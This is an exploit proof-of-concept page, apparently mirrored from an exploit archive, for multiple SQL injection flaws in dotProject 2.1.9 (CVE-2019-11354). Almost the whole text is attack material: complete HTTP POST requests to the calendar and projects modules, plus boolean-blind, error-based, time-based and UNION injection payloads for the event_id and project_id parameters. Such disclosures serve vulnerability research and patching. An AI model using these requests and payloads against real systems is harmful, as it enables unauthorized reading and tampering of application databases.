Exploit for dotProject 2.1.9 SQL Injection CVE-2019-11354

## https://sploitus.com/exploit?id=PACKETSTORM:153375
# Exploit Title: dotProject 2.1.9 - Multiple Sql Injection (Poc)  
# Exploit Author: Metin Yunus Kandemir (kandemir)  
# Vendor Homepage: https://dotproject.net  
# Software Link: https://github.com/dotproject/dotProject/archive/v2.1.9.zip  
# Version: 2.1.9  
# Category: Webapps  
# Tested on: Xampp for Windows  
# Software Description : dotProject is a volunteer supported Project Management application. There is no "company" behind this project, it is managed, maintained, developed and supported by a volunteer group and by the users themselves.  
  
==================================================================  
  
  
event_id (POST) - Sql injection PoC  
  
POST /dotProject-2.1.9/index.php?m=calendar HTTP/1.1  
Host: xxx.xxx.x.xx  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://xxx.xxx.x.xx/dotProject-2.1.9/index.php?m=calendar&a=addedit  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 273  
Cookie: dotproject=gfkt21luioqv9eoh25hdaloe7v; client_lang=english; client_login_name=test1  
Connection: close  
Upgrade-Insecure-Requests: 1  
  
dosql=do_event_aed&event_id=0&event_project=[SQLi]&event_assigned=1&event_title=test&  
event_description=hkffkfuy&event_type=0&event_project=0&event_start_date=20190621&start_time=080000&event_end_date=20190621&  
end_time=170000&event_recurs=0&event_times_recuring=1&mail_invited=on  
  
  
  
  
Parameter: event_id (POST)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: dosql=do_event_aed&event_id=0) AND 3236=3236-- rnpG&event_project=0&event_assigned=1&event_title=test&event_description=hkffkfuy&event_type=0&event_project=0&event_start_date=20190621&start_time=080000&event_end_date=20190621&end_time=170000&event_recurs=0&event_times_recuring=1&mail_invited=on  
  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
Payload: dosql=do_event_aed&event_id=0) AND (SELECT 7581 FROM(SELECT COUNT(*),CONCAT(0x7170787a71,(SELECT (ELT(7581=7581,1))),0x71627a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- bOIA&event_project=0&event_assigned=1&event_title=test&event_description=hkffkfuy&event_type=0&event_project=0&event_start_date=20190621&start_time=080000&event_end_date=20190621&end_time=170000&event_recurs=0&event_times_recuring=1&mail_invited=on  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: dosql=do_event_aed&event_id=0) AND (SELECT 6637 FROM (SELECT(SLEEP(5)))bNDB)-- NfAk&event_project=0&event_assigned=1&event_title=test&event_description=hkffkfuy&event_type=0&event_project=0&event_start_date=20190621&start_time=080000&event_end_date=20190621&end_time=170000&event_recurs=0&event_times_recuring=1&mail_invited=on  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 1 column  
Payload: dosql=do_event_aed&event_id=0) UNION ALL SELECT CONCAT(0x7170787a71,0x646772547a6e58774c464e54416963614c64646c7a6f6c745748597350686f535979714443794859,0x71627a6271)-- xXFB&event_project=0&event_assigned=1&event_title=test&event_description=hkffkfuy&event_type=0&event_project=0&event_start_date=20190621&start_time=080000&event_end_date=20190621&end_time=170000&event_recurs=0&event_times_recuring=1&mail_invited=on  
  
  
  
==================================================================  
  
  
MULTIPART project_id ((custom) POST) - Sql Injection Poc  
  
POST /dotProject-2.1.9/index.php?m=projects HTTP/1.1  
Host: 192.168.1.33  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.1.33/dotProject-2.1.9/index.php?m=projects&a=addedit  
Content-Type: multipart/form-data; boundary=---------------------------9310663371787104596119761620  
Content-Length: 2749  
Cookie: dotproject=gfkt21luioqv9eoh25hdaloe7v; client_lang=english; client_login_name=test1  
Connection: close  
Upgrade-Insecure-Requests: 1  
  
-----------------------------9310663371787104596119761620  
Content-Disposition: form-data; name="dosql"  
  
do_project_aed  
-----------------------------9310663371787104596119761620  
Content-Disposition: form-data; name="project_id"  
  
[SQLi]  
-----------------------------9310663371787104596119761620  
Content-Disposition: form-data; name="project_creator"  
  
1  
.  
..snip  
..snip  
.  
  
-----------------------------9310663371787104596119761620  
Content-Disposition: form-data; name="import_tasks_from"  
  
0  
-----------------------------9310663371787104596119761620  
Content-Disposition: form-data; name="project_description"  
  
fasdf  
-----------------------------9310663371787104596119761620--  
  
  
  
Parameter: MULTIPART project_id ((custom) POST)  
Type: boolean-based blind  
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause  
Payload: 0 RLIKE (SELECT (CASE WHEN (6146=6146) THEN '' ELSE 0x28 END))  
  
Type: error-based  
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)  
Payload: 0 AND EXTRACTVALUE(9751,CONCAT(0x5c,0x716b767871,(SELECT (ELT(9751=9751,1))),0x716b6a6a71))  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: 0 AND (SELECT 6725 FROM (SELECT(SLEEP(5)))WETe)  
  
  
#  
#  
#